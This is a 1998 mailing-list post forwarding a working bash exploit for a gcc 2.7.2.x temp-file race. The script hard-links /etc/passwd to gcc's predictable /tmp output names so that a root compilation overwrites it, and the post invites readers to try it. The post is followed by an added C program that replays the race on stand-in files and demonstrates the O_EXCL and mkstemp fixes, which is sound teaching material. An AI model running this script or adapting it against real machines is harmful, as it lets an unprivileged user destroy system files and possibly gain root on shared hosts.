GCC bug...!!!

Kostas Vlassis lonewolf at compulink.gr
Sun Jan 18 14:37:38 EET 1998


For those who don't visit www.rootshell.com regularly:

http://www.rootshell.com/archive-evz8t6yapbpetxcq/199801/gcc-exploit-2

--
 Kostas Vlassis, Student of the NUoA, Chemistry Dept
 E-mail: lonewolf at compulink.gr
 URL: http://www.compulink.gr/users/lonewolf


-------------- next part --------------

Try this. Launch it as an unprivileged user in the background (screen?), then,
as root, try to compile any file or project using gcc (e.g. a typical
daemon, service, client), and watch your /etc/passwd (or any other
vital file, e.g. /dev/kmem, /dev/hda). The attached exploit is an improved
version of the one I previously posted to BUGTRAQ (yesterday).

It's also possible to overwrite other users' files (if only they
use gcc occasionally), system logs etc.

Vulnerable platforms: any running gcc 2.7.2.x
Compromise: overwriting files, maybe root; exploitable locally.

-- cut here --

#!/bin/bash

# [ http://www.rootshell.com ] 1/16/98
# Simple GCC exploit (tested under 2.7.2.3.f.1)
# - by Michal Zalewski (lcamtuf at staszic.waw.pl)
# ---------------------------------------------
# Usage: "screen ./gcc_ln" then Ctrl+A,D
# ---------------------------------------------
# Ugh, blah... Should be written in C for
# better performance, but I have no time :)
#
# How it works: gcc 2.7.2.x writes its intermediate files to /tmp under
# predictable names (ccNNNN.i, ccNNNN.s, ccNNNN1.o) and simply overwrites
# whatever is already at those names.  As soon as a ccNNNN.i shows up, hard
# link the victim file to the matching .s and .o names; when the compiler
# (running as root) writes its output, it overwrites the victim instead.
# Hard links need the victim to be on the same filesystem as /tmp.

VICTIM=/etc/passwd

if [ ! -f $VICTIM ]; then
  echo "I can't see my victim ($VICTIM)..."
  exit 0
fi

# Remember the victim's size so we can tell when it has been clobbered.
ORIG=`ls -l $VICTIM|awk '{print \$5}'`

echo "GCC exploit launched against $VICTIM ($ORIG bytes)."

# Lower the priority so the busy loop is less noticeable (this renices the
# parent shell; $$ would renice the script itself).
renice +20 $PPID >&/dev/null

cd /tmp

while [ 1 ]; do

  # Temp base name of any compilation currently in progress.
  V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
  
  if [ ! "$V" = "" ]; then
    # Race: plant the hard links before gcc creates its .s and .o outputs.
    ln $VICTIM ${V}.s &>/dev/null
    ln $VICTIM ${V}1.o &>/dev/null
    NOWY=`ls -l $VICTIM|awk '{print \$5}'`
    if [ "$ORIG" = "$NOWY" ]; then
      echo -n "."
      rm -f ${V}.s ${V}1.o &>/dev/null
    else
      echo "Voila. I'm so smart."
      rm -f ${V}.s ${V}1.o &>/dev/null
      exit 0
    fi
  fi

done
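The bug the script above abuses is a temp-file race: the compiler opens a
predictable name in a world-writable directory and overwrites whatever is
there, so a hard link planted by another user redirects the write into that
user's chosen target. The C program below is an added illustration, not code
from the post or from gcc. It plays both halves of the race in a private
directory under /tmp with a constructed stand-in for /etc/passwd and a
hypothetical temp name (cc12345.s), and contrasts the trusting O_TRUNC open
with an O_EXCL open and with mkstemp(). Note that O_NOFOLLOW does not help
here: the planted entry is a hard link, not a symlink, so the only defences
are refusing to reuse an existing name (O_EXCL), picking an unpredictable
name (mkstemp), or, on current Linux, fs.protected_hardlinks=1, which stops
unprivileged users from linking files they do not own.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructed stand-in for the victim's content; no real /etc/passwd is touched. */
static const char VICTIM_DATA[] = "root:x:0:0:root:/root:/bin/sh\n";
/* Constructed stand-in for the compiler's assembler output. */
static const char ASM_DATA[] = "\t.text\n\t.globl main\n";

/* Vulnerable pattern: open the predictable temp name with O_TRUNC.  If
 * another user has hard-linked a file to that name, the truncate and the
 * write land on the linked target.  Returns bytes written or -1. */
int write_trusting(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return (int)n;
}

/* Hardened: O_EXCL makes open() fail with EEXIST when anything already sits
 * at that name, a planted hard link included.  Returns bytes written or -1. */
int write_exclusive(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return (int)n;
}

/* Returns 1 if the file still holds VICTIM_DATA, 0 if clobbered, -1 on error. */
int victim_intact(const char *path)
{
    char buf[sizeof VICTIM_DATA];
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return strcmp(buf, VICTIM_DATA) == 0;
}

/* Play the race in a private directory.  The attacker's half is what the
 * shell script does ("ln $VICTIM ccNNNN.s") before the compiler writes.
 * Returns 1 if the victim was overwritten, 0 if it survived, -1 on error. */
int run_race(int hardened)
{
    char dir[] = "/tmp/lnrace.XXXXXX";
    char victim[64], predictable[64];
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/passwd", dir);
    snprintf(predictable, sizeof predictable, "%s/cc12345.s", dir); /* hypothetical name */

    if (write_trusting(victim, VICTIM_DATA) < 0)
        return -1;
    /* Attacker: hard link the victim to the name the compiler is about to open. */
    if (link(victim, predictable) < 0)
        return -1;
    /* Compiler: write its assembler output to "its" temp file. */
    if (hardened)
        write_exclusive(predictable, ASM_DATA);   /* fails with EEXIST */
    else
        write_trusting(predictable, ASM_DATA);    /* overwrites the victim */

    int intact = victim_intact(victim);
    unlink(predictable);
    unlink(victim);
    rmdir(dir);
    return intact < 0 ? -1 : !intact;
}

/* What later compilers do: let mkstemp() pick an unpredictable name and open
 * it O_EXCL in one step.  Returns bytes written to the fresh file, or -1. */
int mkstemp_demo(void)
{
    char path[] = "/tmp/ccXXXXXX";
    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, ASM_DATA, strlen(ASM_DATA));
    close(fd);
    unlink(path);
    return (int)n;
}

int main(void)
{
    printf("predictable name, O_TRUNC: victim %s\n", run_race(0) == 1 ? "overwritten" : "intact");
    printf("predictable name, O_EXCL:  victim %s\n", run_race(1) == 1 ? "overwritten" : "intact");
    printf("mkstemp: wrote %d bytes to a random name\n", mkstemp_demo());
    return 0;
}
```

Run it as any user; the first line reports the victim overwritten, the
second reports it intact because open() refused the pre-planted name.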


More information about the Linux-greek-users mailing list